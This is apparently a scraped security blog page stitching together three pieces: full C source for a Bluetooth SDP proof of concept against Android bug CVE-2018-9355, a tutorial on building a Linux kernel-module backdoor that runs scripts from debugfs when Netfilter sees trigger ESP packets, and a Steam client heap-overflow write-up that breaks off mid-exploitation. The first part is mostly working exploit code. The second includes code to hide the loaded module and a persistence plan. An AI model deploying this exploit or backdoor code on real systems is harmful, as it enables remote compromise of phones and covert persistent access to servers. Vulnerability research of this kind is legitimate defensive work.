PoC for Android Bluetooth bug CVE-2018-9355

CVE-2018-9355 A-74016921 RCE Critical 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0, 8.1
Картинки по запросу Android Kernel CVE POC
/*
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 *
 */

/** CVE-2018-9355
 *  https://source.android.com/security/bulletin/2018-06-01
 */

#include <errno.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdbool.h>
#include <sys/stat.h>
#include <sys/un.h>
#include <pthread.h>

#include <bluetooth/bluetooth.h>
#include <bluetooth/sdp.h>
#include <bluetooth/l2cap.h>
#include <bluetooth/hci.h>
#include <bluetooth/hci_lib.h>


#define EIR_FLAGS                   0x01  /* flags */
#define EIR_NAME_COMPLETE           0x09  /* complete local name */
#define EIR_LIM_DISC                0x01 /* LE Limited Discoverable Mode */
#define EIR_GEN_DISC                0x02 /* LE General Discoverable Mode */

#define DATA_ELE_SEQ_DESC_TYPE 6
#define UINT_DESC_TYPE 1


#define SIZE_SIXTEEN_BYTES 4
#define SIZE_EIGHT_BYTES 3
#define SIZE_FOUR_BYTES 2
#define SIZE_TWO_BYTES 1
#define SIZE_ONE_BYTE 0
#define SIZE_IN_NEXT_WORD 6
#define TWO_COMP_INT_DESC_TYPE 2
#define UUID_DESC_TYPE 3
#define ATTR_ID_SERVICE_ID 0x0003

static int count = 0;
static int do_continuation;

static int init_server(uint16_t mtu)
{
	struct l2cap_options opts;
	struct sockaddr_l2 l2addr;
	socklen_t optlen;
	int l2cap_sock;

	/* Create L2CAP socket */
	l2cap_sock = socket(PF_BLUETOOTH, SOCK_SEQPACKET, BTPROTO_L2CAP);
	if (l2cap_sock < 0) {
		printf("opening L2CAP socket: %s", strerror(errno));
		return -1;
	}

	memset(&l2addr, 0, sizeof(l2addr));
	l2addr.l2_family = AF_BLUETOOTH;
	bacpy(&l2addr.l2_bdaddr, BDADDR_ANY);
	l2addr.l2_psm = htobs(SDP_PSM);

	if (bind(l2cap_sock, (struct sockaddr *) &l2addr, sizeof(l2addr)) < 0) {
		printf("binding L2CAP socket: %s", strerror(errno));
		return -1;
	}

	int opt = L2CAP_LM_MASTER;
	if (setsockopt(l2cap_sock, SOL_L2CAP, L2CAP_LM, &opt, sizeof(opt)) < 0) {
		printf("setsockopt: %s", strerror(errno));
		return -1;
	}

	memset(&opts, 0, sizeof(opts));
	optlen = sizeof(opts);

	if (getsockopt(l2cap_sock, SOL_L2CAP, L2CAP_OPTIONS, &opts, &optlen) < 0) {
		printf("getsockopt: %s", strerror(errno));
		return -1;
	}
	opts.omtu = mtu;
	opts.imtu = mtu;

	if (setsockopt(l2cap_sock, SOL_L2CAP, L2CAP_OPTIONS, &opts, sizeof(opts)) < 0) {
		printf("setsockopt: %s", strerror(errno));
		return -1;
	}

	if (listen(l2cap_sock, 5) < 0) {
	  printf("listen: %s", strerror(errno));
	  return -1;
	}

	return l2cap_sock;
}

static int process_service_search_req(uint8_t *pkt)
{
	uint8_t *start = pkt;
	uint8_t *lenloc = pkt;


	/* Total Handles */
	bt_put_be16(400, pkt); pkt += 2;
	bt_put_be16(400, pkt); pkt += 2;

	/* and that's it! */
	/* TODO: Can we do some heap grooming to make sure we don't get a continuation? */

	//bt_put_be16((pkt - start) - 2, lenloc);
	return pkt - start;
}

static uint8_t *place_uid(uint8_t *pkt, int o)
{
	int i;
	for (i = 0; i < 16; i++)
		*pkt++ = 0x16 + (i + o);
	return pkt;

}

static size_t flood_u128s(uint8_t *pkt)
{
	int i;
	uint8_t *start = pkt;
	uint8_t *lenloc = pkt;
	size_t retsize = 0;

	bt_put_be16(9, pkt);pkt += 2;

	if (do_continuation == 1) {
		*pkt = DATA_ELE_SEQ_DESC_TYPE << 3;
		*pkt |= SIZE_IN_NEXT_WORD;
		pkt++;
		start = pkt;
		pkt += 2;
	}

	//*pkt = (DATA_ELE_SEQ_DESC_TYPE << 3) | SIZE_TWO_BYTES;
	//pkt++;

	for (i = 0; i < 31; i++) {
		*pkt = (DATA_ELE_SEQ_DESC_TYPE << 3) | SIZE_TWO_BYTES;
		pkt++;

		*pkt = (UINT_DESC_TYPE << 3) | SIZE_TWO_BYTES;;
		pkt++;
		/* Attr ID */
		bt_put_be16(ATTR_ID_SERVICE_ID, pkt); pkt += 2;

		*pkt = (UUID_DESC_TYPE << 3) | SIZE_SIXTEEN_BYTES;
		pkt++;
		pkt = place_uid(pkt, i);
	}
	/* Set the continuation */
	if (do_continuation) {
		bt_put_be16(654, lenloc);
		bt_put_be16(651 * 2, start);
		*pkt = 1;
		retsize = 658;
	}
	else {
		bt_put_be16(651, lenloc);
		//bt_put_be16(648, start);
		*pkt = 0;
		retsize = 654;
	}
	//	bt_put_be16((pkt - lenloc) + 10, lenloc);
	//	bt_put_be16((pkt - start) + 10, start);
	printf("%s: size is pkt - lenloc %zu and pkt is 0x%02x\n", __func__, pkt - lenloc, *pkt);
	pkt++;

	return retsize;

}

static size_t do_fake_svcsar(uint8_t *pkt)
{

	int i;
	uint8_t *start = pkt;
	uint8_t *lenloc = pkt;
	/* Id and length -- ignored in the code */
	//bt_put_be16(0, pkt);pkt += 2;
	//bt_put_be16(0xABCD, pkt);pkt += 2;
	/* list byte count */
	bt_put_be16(9, pkt);pkt += 2;

	*pkt = DATA_ELE_SEQ_DESC_TYPE << 3;
	*pkt |= SIZE_EIGHT_BYTES;
	pkt++;

	*pkt = (DATA_ELE_SEQ_DESC_TYPE << 3) | SIZE_TWO_BYTES;
	pkt++;

	*pkt = (UINT_DESC_TYPE << 3) | SIZE_TWO_BYTES;;
	pkt++;
	/* Attr ID */
	bt_put_be16(0x0100, pkt); pkt += 2;

	*pkt = (DATA_ELE_SEQ_DESC_TYPE << 3) | SIZE_TWO_BYTES;
	pkt++;

	*pkt = (DATA_ELE_SEQ_DESC_TYPE << 3) | SIZE_TWO_BYTES;
	pkt++;

	/* Set the continuation */
	if (do_continuation)
		*pkt = 1;
	else
		*pkt = 1;
	pkt++;

	/* Place the size... */
	//bt_put_be16((pkt - start) - 2, lenloc);

	printf("%zu\n", pkt-start);
	return (size_t) (pkt - start);
}

static void process_request(uint8_t *buf, int fd)
{
	sdp_pdu_hdr_t *reqhdr = (sdp_pdu_hdr_t *) buf;
	sdp_pdu_hdr_t *rsphdr;
	uint8_t *rsp = malloc(65535);
	int status = SDP_INVALID_SYNTAX;
	int send_size = 0;

	memset(rsp, 0, 65535);
	rsphdr = (sdp_pdu_hdr_t *)rsp;
	rsphdr->tid = reqhdr->tid;

	switch (reqhdr->pdu_id) {
	case SDP_SVC_SEARCH_REQ:
		printf("Got a svc srch req\n");
		send_size = process_service_search_req(rsp + sizeof(sdp_pdu_hdr_t));
		rsphdr->pdu_id = SDP_SVC_SEARCH_RSP;
		rsphdr->plen = htons(send_size);
		break;
	case SDP_SVC_ATTR_REQ:
		printf("Got a svc attr req\n");
		//status = service_attr_req(req, &rsp);
		rsphdr->pdu_id = SDP_SVC_ATTR_RSP;
		break;
	case SDP_SVC_SEARCH_ATTR_REQ:
		printf("Got a svc srch attr req\n");
		//status = service_search_attr_req(req, &rsp);
		rsphdr->pdu_id = SDP_SVC_SEARCH_ATTR_RSP;
		send_size = flood_u128s(rsp + sizeof(sdp_pdu_hdr_t));
		//do_fake_svcsar(rsp + sizeof(sdp_pdu_hdr_t)) + 3;
		rsphdr->plen = htons(send_size);
		break;
	default:
		printf("Unknown PDU ID : 0x%x received", reqhdr->pdu_id);
		status = SDP_INVALID_SYNTAX;
		break;
	}
	printf("%s: sending %zu\n", __func__, send_size + sizeof(sdp_pdu_hdr_t));
	send(fd, rsp, send_size + sizeof(sdp_pdu_hdr_t), 0);
	free(rsp);
}


static void *l2cap_data_thread(void *input)
{
	int fd = *(int *)input;
	sdp_pdu_hdr_t hdr;
	uint8_t *buf;
	int len, size;

	while (true) {
		len = recv(fd, &hdr, sizeof(sdp_pdu_hdr_t), MSG_PEEK);
		if (len < 0 || (unsigned int) len < sizeof(sdp_pdu_hdr_t)) {
			continue;
		}

		size = sizeof(sdp_pdu_hdr_t) + ntohs(hdr.plen);
		buf = malloc(size);
		if (!buf)
			continue;

		printf("%s: trying to recv %d\n", __func__, size);
		len = recv(fd, buf, size, 0);
		if (len <= 0) {
			free(buf);
			continue;
		}

		if (!count) {
			process_request(buf, fd);
			count ++;
		}
		if (count >= 1) {
			do_continuation = 0;
			process_request(buf, fd);
			count++;
		}

		free(buf);
	}
}

/* derived from hciconfig.c */
static void *advertiser(void *unused)
{
	uint8_t status;
	int device_id, handle;
	struct hci_request req = { 0 };
	le_set_advertise_enable_cp acp = { 0 };
	le_set_advertising_parameters_cp avc = { 0 };
	le_set_advertising_data_cp data = { 0 };

	device_id = hci_get_route(NULL);

	if (device_id < 0) {
		printf("%s: Failed to get route: %s\n", __func__, strerror(errno));
		return NULL;
	}
	handle = hci_open_dev(hci_get_route(NULL));
	if (handle < 0) {
		printf("%s: Failed to open and aquire handle: %s\n", __func__, strerror(errno));
		return NULL;
	}

	avc.min_interval = avc.max_interval = htobs(150);
	avc.chan_map = 7;
	req.ogf = OGF_LE_CTL;
	req.ocf = OCF_LE_SET_ADVERTISING_PARAMETERS;
	req.cparam = &avc;
	req.clen = LE_SET_ADVERTISING_PARAMETERS_CP_SIZE;
	req.rparam = &status;
	req.rlen = 1;

	if (hci_send_req(handle, &req, 1000) < 0) {
		hci_close_dev(handle);
		printf("%s: Failed to send request %s\n", __func__, strerror(errno));
		return NULL;
	}
	memset(&req, 0, sizeof(req));
	req.ogf = OGF_LE_CTL;
	req.ocf = OCF_LE_SET_ADVERTISE_ENABLE;
	req.cparam = &acp;
	req.clen = LE_SET_ADVERTISE_ENABLE_CP_SIZE;
	req.rparam = &status;
	req.rlen = 1;

	data.data[0] = htobs(2);
	data.data[1] = htobs(EIR_FLAGS);
	data.data[2] = htobs(EIR_GEN_DISC | EIR_LIM_DISC);

	data.data[3] = htobs(6);
	data.data[4] = htobs(EIR_NAME_COMPLETE);
	data.data[5] = 'D';
	data.data[6] = 'L';
	data.data[7] = 'E';
	data.data[8] = 'A';
	data.data[9] = 'K';

	data.length = 10;

	memset(&req, 0, sizeof(req));
	req.ogf = OGF_LE_CTL;
	req.ocf = OCF_LE_SET_ADVERTISING_DATA;
	req.cparam = &data;
	req.clen = LE_SET_ADVERTISING_DATA_CP_SIZE;
	req.rparam = &status;
	req.rlen = 1;

	if (hci_send_req(handle, &req, 1000) < 0) {
		hci_close_dev(handle);
		printf("%s: Failed to send request %s\n", __func__, strerror(errno));
		return NULL;
	}
	printf("Device should be advertising under DLEAK\n");
}



int main(int argc, char **argv)
{
	pthread_t *io_channel;
	pthread_t adv;
	int       fds[16];
	const int io_chans = 16;
	struct sockaddr_l2 addr;
	socklen_t qlen = sizeof(addr);
	socklen_t len = sizeof(addr);
	int l2cap_sock;
	int i;


	pthread_create(&adv, NULL, advertiser, NULL);
	l2cap_sock = init_server(652);
	if (l2cap_sock < 0)
		return EXIT_FAILURE;

	io_channel = malloc(io_chans * sizeof(*io_channel));
	if (!io_channel)
		return EXIT_FAILURE;

	do_continuation = 1;
	for (i = 0; i < io_chans; i++) {
		printf("%s: Going to accept on io chan %d\n", __func__, i);
		fds[i] = accept(l2cap_sock, (struct sockaddr *) &addr, &len);
		if (fds[i] < 0) {
			i--;
			printf("%s: Accept failed with %s\n", __func__, strerror(errno));
			continue;
		}
		printf("%s: accepted\n", __func__);
		pthread_create(&io_channel[i], NULL, l2cap_data_thread, &fds[i]);
	}
}
Реклама

Misusing debugfs for In-Memory RCE

An explanation of how debugfs and nf hooks can be used to remotely execute code.

Картинки по запросу debugfs

Introduction

Debugfs is a simple-to-use RAM-based file system specially designed for kernel debugging purposes. It was released with version 2.6.10-rc3 and written by Greg Kroah-Hartman. In this post, I will be showing you how to use debugfs and Netfilter hooks to create a Loadable Kernel Module capable of executing code remotely entirely in RAM.

An attacker’s ideal process would be to first gain unprivileged access to the target, perform a local privilege escalation to gain root access, insert the kernel module onto the machine as a method of persistence, and then pivot to the next target.

Note: The following is tested and working on clean images of Ubuntu 12.04 (3.13.0-32), Ubuntu 14.04 (4.4.0-31), Ubuntu 16.04 (4.13.0-36). All development was done on Arch throughout a few of the most recent kernel versions (4.16+).

Practicality of a debugfs RCE

When diving into how practical using debugfs is, I needed to see how prevalent it was across a variety of systems.

For every Ubuntu release from 6.06 to 18.04 and CentOS versions 6 and 7, I created a VM and checked the three statements below. This chart details the answers to each of the questions for each distro. The main thing I was looking for was to see if it was even possible to mount the device in the first place. If that was not possible, then we won’t be able to use debugfs in our backdoor.

Fortunately, every distro, except Ubuntu 6.06, was able to mount debugfs. Every Ubuntu version from 10.04 and on as well as CentOS 7 had it mounted by default.

  1. Present: Is /sys/kernel/debug/ present on first load?
  2. Mounted: Is /sys/kernel/debug/ mounted on first load?
  3. Possible: Can debugfs be mounted with sudo mount -t debugfs none /sys/kernel/debug?
Operating System Present Mounted Possible
Ubuntu 6.06 No No No
Ubuntu 8.04 Yes No Yes
Ubuntu 10.04* Yes Yes Yes
Ubuntu 12.04 Yes Yes Yes
Ubuntu 14.04** Yes Yes Yes
Ubuntu 16.04 Yes Yes Yes
Ubuntu 18.04 Yes Yes Yes
Centos 6.9 Yes No Yes
Centos 7 Yes Yes Yes
  • *debugfs also mounted on the server version as rw,relatime on /var/lib/ureadahead/debugfs
  • **tracefs also mounted on the server version as rw,relatime on /var/lib/ureadahead/debugfs/tracing

Executing code on debugfs

Once I determined that debugfs is prevalent, I wrote a simple proof of concept to see if you can execute files from it. It is a filesystem after all.

The debugfs API is actually extremely simple. The main functions you would want to use are: debugfs_initialized — check if debugfs is registered, debugfs_create_blob — create a file for a binary object of arbitrary size, and debugfs_remove — delete the debugfs file.

In the proof of concept, I didn’t use debugfs_initialized because I know that it’s present, but it is a good sanity-check.

To create the file, I used debugfs_create_blob as opposed to debugfs_create_file as my initial goal was to execute ELF binaries. Unfortunately I wasn’t able to get that to work — more on that later. All you have to do to create a file is assign the blob pointer to a buffer that holds your content and give it a length. It’s easier to think of this as an abstraction to writing your own file operations like you would do if you were designing a character device.

The following code should be very self-explanatory. dfs holds the file entry and myblob holds the file contents (pointer to the buffer holding the program and buffer length). I simply call the debugfs_create_blob function after the setup with the name of the file, the mode of the file (permissions), NULL parent, and lastly the data.

struct dentry *dfs = NULL;
struct debugfs_blob_wrapper *myblob = NULL;

int create_file(void){
	unsigned char *buffer = "\
#!/usr/bin/env python\n\
with open(\"/tmp/i_am_groot\", \"w+\") as f:\n\
	f.write(\"Hello, world!\")";

	myblob = kmalloc(sizeof *myblob, GFP_KERNEL);
	if (!myblob){
		return -ENOMEM;
	}

	myblob->data = (void *) buffer;
	myblob->size = (unsigned long) strlen(buffer);

	dfs = debugfs_create_blob("debug_exec", 0777, NULL, myblob);
	if (!dfs){
		kfree(myblob);
		return -EINVAL;
	}
	return 0;
}

Deleting a file in debugfs is as simple as it can get. One call to debugfs_remove and the file is gone. Wrapping an error check around it just to be sure and it’s 3 lines.

void destroy_file(void){
	if (dfs){
		debugfs_remove(dfs);
	}
}

Finally, we get to actually executing the file we created. The standard and as far as I know only way to execute files from kernel-space to user-space is through a function called call_usermodehelper. M. Tim Jones wrote an excellent article on using UMH called Invoking user-space applications from the kernel, so if you want to learn more about it, I highly recommend reading that article.

To use call_usermodehelper we set up our argv and envp arrays and then call the function. The last flag determines how the kernel should continue after executing the function (“Should I wait or should I move on?”). For the unfamiliar, the envp array holds the environment variables of a process. The file we created above and now want to execute is /sys/kernel/debug/debug_exec. We can do this with the code below.

void execute_file(void){
	static char *envp[] = {
		"SHELL=/bin/bash",
		"PATH=/usr/local/sbin:/usr/local/bin:"\
			"/usr/sbin:/usr/bin:/sbin:/bin",
		NULL
	};

	char *argv[] = {
		"/sys/kernel/debug/debug_exec",
		NULL
	};

	call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}

I would now recommend you try the PoC code to get a good feel for what is being done in terms of actually executing our program. To check if it worked, run ls /tmp/ and see if the file i_am_groot is present.

Netfilter

We now know how our program gets executed in memory, but how do we send the code and get the kernel to run it remotely? The answer is by using Netfilter! Netfilter is a framework in the Linux kernel that allows kernel modules to register callback functions called hooks in the kernel’s networking stack.

If all that sounds too complicated, think of a Netfilter hook as a bouncer of a club. The bouncer is only allowed to let club-goers wearing green badges to go through (ACCEPT), but kicks out anyone wearing red badges (DENY/DROP). He also has the option to change anyone’s badge color if he chooses. Suppose someone is wearing a red badge, but the bouncer wants to let them in anyway. The bouncer can intercept this person at the door and alter their badge to be green. This is known as packet “mangling”.

For our case, we don’t need to mangle any packets, but for the reader this may be useful. With this concept, we are allowed to check any packets that are coming through to see if they qualify for our criteria. We call the packets that qualify “trigger packets” because they trigger some action in our code to occur.

Netfilter hooks are great because you don’t need to expose any ports on the host to get the information. If you want a more in-depth look at Netfilter you can read the article here or the Netfilter documentation.

netfilter hooks

When I use Netfilter, I will be intercepting packets in the earliest stage, pre-routing.

ESP Packets

The packet I chose to use for this is called ESP. ESP or Encapsulating Security Payload Packets were designed to provide a mix of security services to IPv4 and IPv6. It’s a fairly standard part of IPSec and the data it transmits is supposed to be encrypted. This means you can put an encrypted version of your script on the client and then send it to the server to decrypt and run.

Netfilter Code

Netfilter hooks are extremely easy to implement. The prototype for the hook is as follows:

unsigned int function_name (
		unsigned int hooknum,
		struct sk_buff *skb,
		const struct net_device *in,
		const struct net_device *out,
		int (*okfn)(struct sk_buff *)
);

All those arguments aren’t terribly important, so let’s move on to the one you need: struct sk_buff *skbsk_buffs get a little complicated so if you want to read more on them, you can find more information here.

To get the IP header of the packet, use the function skb_network_header and typecast it to a struct iphdr *.

struct iphdr *ip_header;

ip_header = (struct iphdr *)skb_network_header(skb);
if (!ip_header){
	return NF_ACCEPT;
}

Next we need to check if the protocol of the packet we received is an ESP packet or not. This can be done extremely easily now that we have the header.

if (ip_header->protocol == IPPROTO_ESP){
	// Packet is an ESP packet
}

ESP Packets contain two important values in their header. The two values are SPI and SEQ. SPI stands for Security Parameters Index and SEQ stands for Sequence. Both are technically arbitrary initially, but it is expected that the sequence number be incremented each packet. We can use these values to define which packets are our trigger packets. If a packet matches the correct SPI and SEQ values, we will perform our action.

if ((esp_header->spi == TARGET_SPI) &&
	(esp_header->seq_no == TARGET_SEQ)){
	// Trigger packet arrived
}

Once you’ve identified the target packet, you can extract the ESP data using the struct’s member enc_data. Ideally, this would be encrypted thus ensuring the privacy of the code you’re running on the target computer, but for the sake of simplicity in the PoC I left it out.

The tricky part is that Netfilter hooks are run in a softirq context which makes them very fast, but a little delicate. Being in a softirq context allows Netfilter to process incoming packets across multiple CPUs concurrently. They cannot go to sleep and deferred work runs in an interrupt context (this is very bad for us and it requires using delayed workqueues as seen in state.c).

The full code for this section can be found here.

Limitations

  1. Debugfs must be present in the kernel version of the target (>= 2.6.10-rc3).
  2. Debugfs must be mounted (this is trivial to fix if it is not).
  3. rculist.h must be present in the kernel (>= linux-2.6.27.62).
  4. Only interpreted scripts may be run.

Anything that contains an interpreter directive (python, ruby, perl, etc.) works together when calling call_usermodehelper on it. See this wikipedia article for more information on the interpreter directive.

void execute_file(void){
	static char *envp[] = {
		"SHELL=/bin/bash",
		"HOME=/root/",
		"USER=root",
		"PATH=/usr/local/sbin:/usr/local/bin:"\
			"/usr/sbin:/usr/bin:/sbin:/bin",
		"DISPLAY=:0",
		"PWD=/", 
		NULL
	};

	char *argv[] = {
		"/sys/kernel/debug/debug_exec",
		NULL
	};

    call_usermodehelper(argv[0], argv, envp, UMH_WAIT_PROC);
}

Go also works, but it’s arguably not entirely in RAM as it has to make a temp file to build it and it also requires the .go file extension making this a little more obvious.

void execute_file(void){
	static char *envp[] = {
		"SHELL=/bin/bash",
		"HOME=/root/",
		"USER=root",
		"PATH=/usr/local/sbin:/usr/local/bin:"\
			"/usr/sbin:/usr/bin:/sbin:/bin",
		"DISPLAY=:0",
		"PWD=/", 
		NULL
	};

	char *argv[] = {
		"/usr/bin/go",
		"run",
		"/sys/kernel/debug/debug_exec.go",
		NULL
	};

    call_usermodehelper(argv[0], argv, envp, UMH_WAIT_PROC);
}

Discovery

If I were to add the ability to hide a kernel module (which can be done trivially through the following code), discovery would be very difficult. Long-running processes executing through this technique would be obvious as there would be a process with a high pid number, owned by root, and running <interpreter> /sys/kernel/debug/debug_exec. However, if there was no active execution, it leads me to believe that the only method of discovery would be a secondary kernel module that analyzes custom Netfilter hooks.

struct list_head *module;
int module_visible = 1;

void module_unhide(void){
	if (!module_visible){
		list_add(&(&__this_module)->list, module);
		module_visible++;
	}
}

void module_hide(void){
	if (module_visible){
		module = (&__this_module)->list.prev;
		list_del(&(&__this_module)->list);
		module_visible--;
	}
}

Mitigation

The simplest mitigation for this is to remount debugfs as noexec so that execution of files on it is prohibited. To my knowledge, there is no reason to have it mounted the way it is by default. However, this could be trivially bypassed. An example of execution no longer working after remounting with noexec can be found in the screenshot below.

For kernel modules in general, module signing should be required by default. Module signing involves cryptographically signing kernel modules during installation and then checking the signature upon loading it into the kernel. “This allows increased kernel security by disallowing the loading of unsigned modules or modules signed with an invalid key. Module signing increases security by making it harder to load a malicious module into the kernel.

debugfs with noexec

# Mounted without noexec (default)
cat /etc/mtab | grep "debugfs"
ls -la /tmp/i_am_groot
sudo insmod test.ko
ls -la /tmp/i_am_groot
sudo rmmod test.ko
sudo rm /tmp/i_am_groot
sudo umount /sys/kernel/debug
# Mounted with noexec
sudo mount -t debugfs none -o rw,noexec /sys/kernel/debug
ls -la /tmp/i_am_groot
sudo insmod test.ko
ls -la /tmp/i_am_groot
sudo rmmod test.ko

Future Research

An obvious area to expand on this would be finding a more standard way to load programs as well as a way to load ELF files. Also, developing a kernel module that can distinctly identify custom Netfilter hooks that were loaded in from kernel modules would be useful in defeating nearly every LKM rootkit that uses Netfilter hooks.

Remote Code Execution Vulnerability in the Steam Client

Remote Code Execution Vulnerability in the Steam Client

Frag Grenade! A Remote Code Execution Vulnerability in the Steam Client

Frag Grenade! A Remote Code Execution Vulnerability in the Steam Client

This blog post explains the story behind a bug which had existed in the Steam client for at least the last ten years, and until last July would have resulted in remote code execution (RCE) in all 15 million active clients.

The keen-eyed, security conscious PC gamers amongst you may have noticed that Valve released a new update to the Steam client in recent weeks.
This blog post aims to justify why we play games in the office explain the story behind the corresponding bug, which had existed in the Steam client for at least the last ten years, and until last July would have resulted in remote code execution (RCE) in all 15 million active clients.
Since July, when Valve (finally) compiled their code with modern exploit protections enabled, it would have simply caused a client crash, with RCE only possible in combination with a separate info-leak vulnerability.
Our vulnerability was reported to Valve on the 20th February 2018 and to their credit, was fixed in the beta branch less than 12 hours later. The fix was pushed to the stable branch on the 22nd March 2018.

Overview

At its core, the vulnerability was a heap corruption within the Steam client library that could be remotely triggered, in an area of code that dealt with fragmented datagram reassembly from multiple received UDP packets.

The Steam client communicates using a custom protocol – the “Steam protocol” – which is delivered on top of UDP. There are two fields of particular interest in this protocol which are relevant to the vulnerability:

  • Packet length
  • Total reassembled datagram length

The bug was caused by the absence of a simple check to ensure that, for the first packet of a fragmented datagram, the specified packet length was less than or equal to the total datagram length. This seems like a simple oversight, given that the check was present for all subsequent packets carrying fragments of the datagram.

Without additional info-leaking bugs, heap corruptions on modern operating systems are notoriously difficult to control to the point of granting remote code execution. In this case, however, thanks to Steam’s custom memory allocator and (until last July) no ASLR on the steamclient.dll binary, this bug could have been used as the basis for a highly reliable exploit.

What follows is a technical write-up of the vulnerability and its subsequent exploitation, to the point where code execution is achieved.

Vulnerability Details

PREREQUISITE KNOWLEDGE

Protocol

The Steam protocol has been reverse engineered and well documented by others (e.g. https://imfreedom.org/wiki/Steam_Friends) from analysis of traffic generated by the Steam client. The protocol was initially documented in 2008 and has not changed significantly since then.

The protocol is implemented as a connection-orientated protocol over the top of a UDP datagram stream. The packet structure, as documented in the existing research linked above, is as follows:

Key points:

  • All packets start with the 4 bytes “VS01
  • packet_len describes the length of payload (for unfragmented datagrams, this is equal to data length)
  • type describes the type of packet, which can take the following values:
    • 0x2 Authenticating Challenge
    • 0x4 Connection Accept
    • 0x5 Connection Reset
    • 0x6 Packet is a datagram fragment
    • 0x7 Packet is a standalone datagram
  • The source and destination fields are IDs assigned to correctly route packets from multiple connections within the steam client
  • In the case of the packet being a datagram fragment:
    • split_count refers to the number of fragments that the datagram has been split up into
    • data_len refers to the total length of the reassembled datagram
  • The initial handling of these UDP packets occurs in the CUDPConnection::UDPRecvPkt function within steamclient.dll

Encryption

The payload of the datagram packet is AES-256 encrypted, using a key negotiated between the client and server on a per-session basis. Key negotiation proceeds as follows:

  • Client generates a 32-byte random AES key and RSA encrypts it with Valve’s public key before sending to the server.
  • The server, in possession of the private key, can decrypt this value and accepts it as the AES-256 key to be used for the session
  • Once the key is negotiated, all payloads sent as part of this session are encrypted using this key.

VULNERABILITY

The vulnerability exists within the RecvFragment method of the CUDPConnection class. No symbols are present in the release version of the steamclient library, however a search through the strings present in the binary will reveal a reference to “CUDPConnection::RecvFragment” in the function of interest. This function is entered when the client receives a UDP packet containing a Steam datagram of type 0x6 (Datagram fragment).

1. The function starts by checking the connection state to ensure that it is in the “Connected” state.
2. The data_len field within the Steam datagram is then inspected to ensure it contains fewer than a seemingly arbitrary 0x20000060 bytes.
3. If this check is passed, it then checks to see if the connection is already collecting fragments for a particular datagram or whether this is the first packet in the stream.

Figure 1

4. If this is the first packet in the stream, the split_count field is then inspected to see how many packets this stream is expected to span
5. If the stream is split over more than one packet, the seq_no_of_first_pkt field is inspected to ensure that it matches the sequence number of the current packet, ensuring that this is indeed the first packet in the stream.
6. The data_len field is again checked against the arbitrary limit of 0x20000060 and also the split_count is validated to be less than 0x709bpackets.

Figure 2

7. If these assertions are true, a Boolean is set to indicate we are now collecting fragments and a check is made to ensure we do not already have a buffer allocated to store the fragments.

Figure 3

8. If the pointer to the fragment collection buffer is non-zero, the current fragment collection buffer is freed and a new buffer is allocated (see yellow box in Figure 4 below). This is where the bug manifests itself. As expected, a fragment collection buffer is allocated with a size of data_lenbytes. Assuming this succeeds (and the code makes no effort to check – minor bug), then the datagram payload is then copied into this buffer using memmove, trusting the field packet_len to be the number of bytes to copy. The key oversight by the developer is that no check is made that packet_len is less than or equal to data_len. This means that it is possible to supply a data_len smaller than packet_len and have up to 64kb of data (due to the 2-byte width of the packet_len field) copied to a very small buffer, resulting in an exploitable heap corruption.

Figure 4

Exploitation

This section assumes an ASLR work-around is present, leading to the base address of steamclient.dll being known ahead of exploitation.

SPOOFING PACKETS

In order for an attacker’s UDP packets to be accepted by the client, they must observe an outbound (client->server) datagram being sent in order to learn the client/server IDs of the connection along with the sequence number. The attacker must then spoof the UDP packet source/destination IPs and ports, along with the client/server IDs and increment the observed sequence number by one.

MEMORY MANAGEMENT

For allocations larger than 1024 (0x400) bytes, the default system allocator is used. For allocations smaller or equal to 1024 bytes, Steam implements a custom allocator that works in the same way across all supported platforms. In-depth discussion of this custom allocator is beyond the scope of this blog, except for the following key points:

  1. Large blocks of memory are requested from the system allocator that are then divided into fixed-size chunks used to service memory allocation requests from the steam client.
  2. Allocations are sequential with no metadata separating the in-use chunks.
  3. Each large block maintains its own freelist, implemented as a singly linked list.
  4. The head of the freelist points to the first free chunk in a block, and the first 4-bytes of that chunk points to the next free chunk if one exists.

Allocation

When a block is allocated, the first free block is unlinked from the head of the freelist, and the first 4-bytes of this block corresponding to the next_free_block are copied into the freelist_head member variable within the allocator class.

Deallocation

When a block is freed, the freelist_head field is copied into the first 4 bytes of the block being freed (next_free_block), and the address of the block being freed is copied into the freelist_head member variable within the allocator class.

ACHIEVING A WRITE-WHAT-WHERE PRIMITIVE

The buffer overflow occurs in the heap, and depending on the size of the packets used to cause the corruption, the allocation could be controlled by either the default Windows allocator (for allocations larger than 0x400 bytes) or the custom Steam allocator (for allocations smaller than 0x400 bytes). Given the lack of security features of the custom Steam allocator, I chose this as the simpler of the two to exploit.

Referring back to the section on memory management, it is known that the head of the freelist for blocks of a given size is stored as a member variable in the allocator class, and a pointer to the next free block in the list is stored as the first 4 bytes of each free block in the list.

The heap corruption allows us to overwrite the next_free_block pointer if there is a free block adjacent to the block that the overflow occurs in. Assuming that the heap can be groomed to ensure this is the case, the overwritten next_free_block pointer can be set to an address to write to, and then a future allocation will be written to this location.

USING DATAGRAMS VS FRAGMENTS

The memory corruption bug occurs in the code responsible for processing datagram fragments (Type 6 packets). Once the corruption has occurred, the RecvFragment() function is in a state where it is expecting more fragments to arrive. However, if they do arrive, a check is made to ensure:

fragment_size + num_bytes_already_received < sizeof(collection_buffer)

This will obviously not be the case, as our first packet has already violated that assertion (the bug depends on the omission of this check) and an error condition will be raised. To avoid this, the CUDPConnection::RecvFragment() method must be avoided after memory corruption has occurred.

Thankfully, CUDPConnection::RecvDatagram() is still able to receive and process type 7 (Datagram) packets sent whilst RecvFragment() is out of action and can be used to trigger the write primitive.

THE ENCRYPTION PROBLEM

Packets being received by both RecvDatagram() and RecvFragment() are expected to be encrypted. In the case of RecvDatagram(), the decryption happens almost immediately after the packet has been received. In the case of RecvFragment(), it happens after the last fragment of the session has been received.

